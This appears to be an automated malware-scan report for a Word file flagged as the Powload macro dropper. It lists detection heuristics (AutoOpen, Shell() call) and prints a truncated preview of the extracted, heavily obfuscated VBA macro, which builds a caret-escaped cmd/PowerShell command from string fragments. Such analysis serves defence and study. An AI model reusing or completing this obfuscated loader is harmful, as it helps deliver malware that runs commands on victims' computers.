MALICIOUS
202
Risk Score
Heuristics 6
-
ClamAV: Doc.Dropper.Powload-6922834-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powload-6922834-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8120 bytes |
SHA-256: 46800935e5e383557a111879625240b51560fae8ce3ec98ca8b7c93825cd6d04 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JaGDchvzVm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qziWUiTLh" Function BrXdNCmR() On _ Error _ Resume _ Next Hour 91408 * lPOzPD * 56504 * ttUsp Hour CvlbG * SwcPaM / 204 * LCjGO CzzCmpY = "md /V:" + "/" + "C" + Chr(2 + 3 + 4 + 5 + 20) + "^s^" + "e^t ^K" + "^u^S=^" + "A" + "^" + "ACA" + "^" Hour wvkwPR * uGStwH / 2952 / ipvSQ Hour pqdCiq * maOLYw * qHVAHi / 17733 PhmkfcHKnj = "g^A^AI^" + "A^AC" + "A^g" + "^A^AI" + "A^ACA" + "^g" + "^AA" + "^" + "IAAC" + "^" + "A" Hour MJpwR * swrNG * VMjAGU / 83890 Hour 51787 * onYWvV Hour jDXrhZ / JDahY / qYBqUG * Pjkjw Hour RGcoQ * RcGRGk fTzKI = "^g^A" + "A^IA^A" + "C^A^" + "gAAI" + "AAC^A^g" + "^" + "A" + "Q^" + "fA" + "^0HA" Hour 31063 / kJWDS Hour 90171 / QzCblR / 70708 / OSkjj OjhVMEK = "^7BAa^" + "AM" + "^GA" + "^0^B^Q" + "Y^A^M^" + "GA9" + "^Bw^O" + "As^GA" Hour 53165 / zLarnH / 15038 * ofivZ Hour AiqwEV * aSOIJW Hour 46791 / PBNTB Hour LqdbkN / HlmHs * 28685 * QYOuLU Hour CdsuO / lGModG * tiTqi * DoEfPs vvJbpr = "^hB" + "^Q^ZAIH" + "^AiB^" + "wO" + "AkGA^U" + "B^QVA^Q" + "C^A" + "^gA^Q^b" + "AU^GA^0" + "^B^Q^S^" + "A" + "^0" Hour hYYfw * dBjYiq Hour KFjGil * friJi / AkVCS * zfucL Hour 4961 * 10516 / PfqnPr / CdPGJ JiuCqN = "CA^l" + "B^w^a^" + "A8GA^" + "2^B^g^b" + "^Ak" + "E^" + "A7A^Q" + "KAk^G^" + "A^U^B^Q" + "VAQC^" Hour 62713 / WTlcRN * MVNvP * VRffLQ Hour VOUwhs / LMtdOl Hour 40985 / cXBIi nfPTBaBwF = "A" + "^g^A^A" + "L" + "^A0^E" + "^A" + "^3" + "^" + "B^wV^A^" + "QCAo^A" + "^Q^ZAwG" + "^A^p^" + "BgR" + "^" Hour 91617 * 76878 Hour 93894 * jYdKhd / 73633 / cCLaEX Hour 68013 / sunpQ Hour 15407 * adslUw / FQfjU * AIURBr Hour 92235 * CnODN / 5946 / ZIIkn zUzWjtrE = "A^" + "Q^G^" + "A^" + "h" + "B^wb^" + "A" + "^" Hour 94163 / rXbjwQ * SZHEq * PGzhfj Hour 62316 * WaIlYJ Hour 40193 / 57710 / 3218 / YIZNwb kKPnUjrIO = "w^" + "G" + "^" + "A^u^B^w" + "d" + "A" + "^8G^A" + "^EB" + "g^L" + "^Ak^" Hour DidlW / UEpkBE Hour 92712 * AbLrQ * FdCwH / jmkEW Jzctj = "G^A^q" + "B^gV^A" + "QC^A7B" + "Q^eAI^" + "HA0B^w" + "^eA^kC^" + "A" + "y^" + "Bw^d^A" + "^M" + "^E^A^k" Hour rwXObo * ftznNL Hour 23404 / QVVtw OFlMKujGTH = "^A^AI^A" + "4" + "G^" + "A^pB^" + "A" + "I^A^0" + "^EA^" + "3B^w" + "V" Hour 74501 * pnREj / 60539 / tEIEDw Hour 52403 * ZjCKtu wfJmnhROG = "^A" + "Q" + "C^A^o^" + "A^A^a^A" + "M^G^" + "AhBQZA^" + "IH^Av" BrXdNCmR = CzzCmpY + PhmkfcHKnj + fTzKI + OjhVMEK + vvJbpr + JiuCqN + nfPTBaBwF + zUzWjtrE + kKPnUjrIO + Jzctj + OFlMKujGTH + wfJmnhROG Hour nAlYt / VkzmBb Hour UqUHQ / 14714 * 34493 / 38391 End Function Function lWRpZ() On _ Error _ Resume _ Next Hour 32641 * RYbVu / 62297 * psiLUL Hour 38187 / avqIw * pYsYk * MqsmK Hour 67922 / zdaAw * iTZnr * 36203 Hour 38108 * rHUZwI * rUjlVp * zwwYwW mVSfYDdZA = "B" + "gZAs" + "^D" + "AnAQZ" + "^Ag^H^" Hour 10729 / MAsoZ Hour 86607 / wzRYrt * GAjjfL / wEMnFF Hour CqOwOu * TXQwdt / TvUzOf / oCaFT ZVXLS = "A^l^" + "Bg^" + "LA" + "cC^ArAA" + "^Z^A^" + "8^G" + "A^3" + "BA^J^" + "A" + "^sCAn^A" + "A^X^Ac" Hour mlnIKv * JsfkJj / SjhzV * RSIqFi Hour 87735 / oYnaM Hour otvqIs * fIVjfs Hour SiWdij * YTiDKT / 56180 * CfhmVz saYIAzpsFHw = "CAr^A^w" + "^Y" + "^Ak" + "G^AsB^g" + "^Y^AUHA" + "^w^" + "B^g^O^A" + "Y^H^" Hour jqpMjA * EzVbIF * QCLSDw / PchkV Hour wQLDs * idnkT / 59709 * hYiIlv TKfzkiJIQ = "Au" + "B^Q^ZA" + "^QC" + "A^" + "9^AQ" + "a" + "A^Q^F^" + "AV^" Hour 71736 / tMrlQ Hour jzzcp / ZjcoNX * 6197 / Mowwj Hour ABVWn / nqMZQi / ocfzfq * PVqXjS Hour 15237 / OLdIjJ / PuEnO * zYAYrz Hour 98957 * izKBSq / ZNPfI * TUZsV MBuiHosLlMz = "B^A^J^A" + "^s" + "D" + "^An^A" + "gNAM^" + "DA0^A" + "w" + "^J^" + "AACA9A" + "^" Hour bMiCGi * znVzi Hour antwO / 92075 / JRTiE / BYmli OkTtmWHq = "A^ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.